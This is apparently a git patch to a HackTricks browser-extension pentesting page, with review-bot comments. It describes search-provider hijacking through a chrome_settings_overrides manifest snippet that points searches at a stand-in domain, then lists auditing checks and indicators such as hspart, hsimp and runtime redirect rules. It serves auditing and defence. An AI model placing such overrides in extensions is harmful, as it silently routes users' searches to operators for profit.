From 5b166444c71ce02e7c3c6bce90a7b36b66fce57f Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Tue, 9 Jun 2026 14:53:31 +0000 Subject: [PATCH] Add content from: SearchJack: 23 Chrome Extensions Silently Monetize ~758,000 ... --- ...rowext-permissions-and-host_permissions.md | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md index 816be994884..3c92bb2750c 100644 --- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md +++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md 
@@ -110,6 +110,45 @@ The extension storage is merely a key-value collection, very similar to [localSt However, advertising companies could also abuse this storage. +### Search provider hijacking with `chrome_settings_overrides` + +A **low-permission** extension can still **take over omnibox searches** via **`chrome_settings_overrides.search_provider`**. Chrome allows an extension to define a custom search endpoint containing **`{searchTerms}`**, so a manifest-only extension can silently route every address-bar search through operator-controlled infrastructure: + +```json +"chrome_settings_overrides": { + "search_provider": { + "name": "Search", + "keyword": "search.example", + "search_url": "https://search.example/search?q={searchTerms}", + "is_default": true + } +} +``` + +This is useful for **search affiliate hijacking** because the extension might need **no content scripts**, **no background logic**, and **no extra API permissions** while still gaining access to a very sensitive data stream: user search intent. + +### Auditing search-override abuse + +When reviewing a browser extension, check whether the advertised feature matches the search override: + +- Search for **`chrome_settings_overrides`**, **`search_provider`**, **`search_url`**, and **`is_default`** in `manifest.json`. +- Flag **manifest-only shells** whose main behavior is changing the default search provider. +- Compare the **extension branding** with the **search endpoint domain**. Utility/new-tab/map/video extensions pointing searches to unrelated domains are suspicious. +- Inspect whether the redirect chain lands in **affiliate search networks**. Parameters such as **`hspart`** and **`hsimp`** are useful to attribute the broker/campaign behind Yahoo Hosted Search style monetization. +- Cluster disposable extensions by repeated backend templates such as identical query parameters, shared paths like **`/admin/public/link`** or **`serp.php`**, and reused search domains. 
+- Compare **store claims** and **privacy policies**. False claims such as “we do not track searches” are strong indicators when the extension clearly proxies queries. + +### Runtime redirect rules can hide the real routing + +Static package review may still miss the real search flow. An extension can ship benign-looking static rules and then install the real redirect logic at runtime via **`chrome.declarativeNetRequest.updateDynamicRules()`**. + +Practical checks: + +- Inspect the **service worker/background script** for `updateDynamicRules()`. +- In an instrumented browser, dump live rules with **`chrome.declarativeNetRequest.getDynamicRules()`** from the extension context. +- Capture **network traffic** while performing omnibox searches and follow the **full redirect chain** until the final search provider. +- Treat decoy static files such as `redirect-rules.json` as insufficient evidence of benign behavior unless runtime rules and live traffic match. + ### More permissions Manifest V3 split page access from API permissions: **`permissions`** still governs privileged APIs (cookies, tabs, history, scripting, etc.) while **`host_permissions`** controls which origins those APIs can touch. MV3 also made host permissions **runtime‑grantable**, so extensions can ship with none and pop a consent prompt later via `chrome.permissions.request()`—handy for legit least‑privilege flows, but also abused by malware to escalate after reputation is established. 
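Review bot: the `chrome_settings_overrides` manifest snippet in this hunk is unlikely to load as written, because Chrome's `search_provider` schema requires `encoding` and `favicon_url` (as well as `name` and `keyword`) unless `prepopulated_id` is set; add `"encoding": "UTF-8"` and a `"favicon_url"` so the example is a valid manifest, and note that settings overrides are only honored on Windows and macOS builds of Chrome, so the "silently route every address-bar search" claim should be scoped accordingly (the install prompt also lists the search-engine change as a warning). Two related consistency points: the first subsection says the technique needs "no extra API permissions", but the "Runtime redirect rules" subsection relies on `chrome.declarativeNetRequest.updateDynamicRules()`, which requires the `declarativeNetRequest` permission and `host_permissions` for redirect actions, so one of the two statements should be qualified. The runtime-audit checklist should also cover session-scoped rules: `chrome.declarativeNetRequest.updateSessionRules()` installs redirects that never appear in `getDynamicRules()`, so the dump step should call `getSessionRules()` as well.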
@@ -156,6 +195,9 @@ However, tightening security measures often results in decreased flexibility and - [https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing](https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing) - [https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/malicious-browser-extensions-feb-2025/](https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/malicious-browser-extensions-feb-2025/) - [https://developer.chrome.com/blog/resuming-the-transition-to-mv3/](https://developer.chrome.com/blog/resuming-the-transition-to-mv3/) +- [https://malext.io/reports/SearchJack/](https://malext.io/reports/SearchJack/) +- [https://developer.chrome.com/docs/extensions/reference/manifest/chrome-settings-override](https://developer.chrome.com/docs/extensions/reference/manifest/chrome-settings-override) +- [https://developer.chrome.com/docs/extensions/reference/api/declarativeNetRequest](https://developer.chrome.com/docs/extensions/reference/api/declarativeNetRequest) {{#include ../../banners/hacktricks-training.md}}
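Review bot: the indicators introduced in the previous hunk (`hspart`, `hsimp`, `/admin/public/link`, `serp.php`) are attributed to nothing in the body text, and this hunk only appends the SearchJack report to the trailing reference list; add an inline link to `https://malext.io/reports/SearchJack/` in the "Auditing search-override abuse" subsection so readers can tell those specific paths and parameters are campaign observations from that report rather than general Chrome behavior. The two developer.chrome.com links are appropriate and match the existing list style.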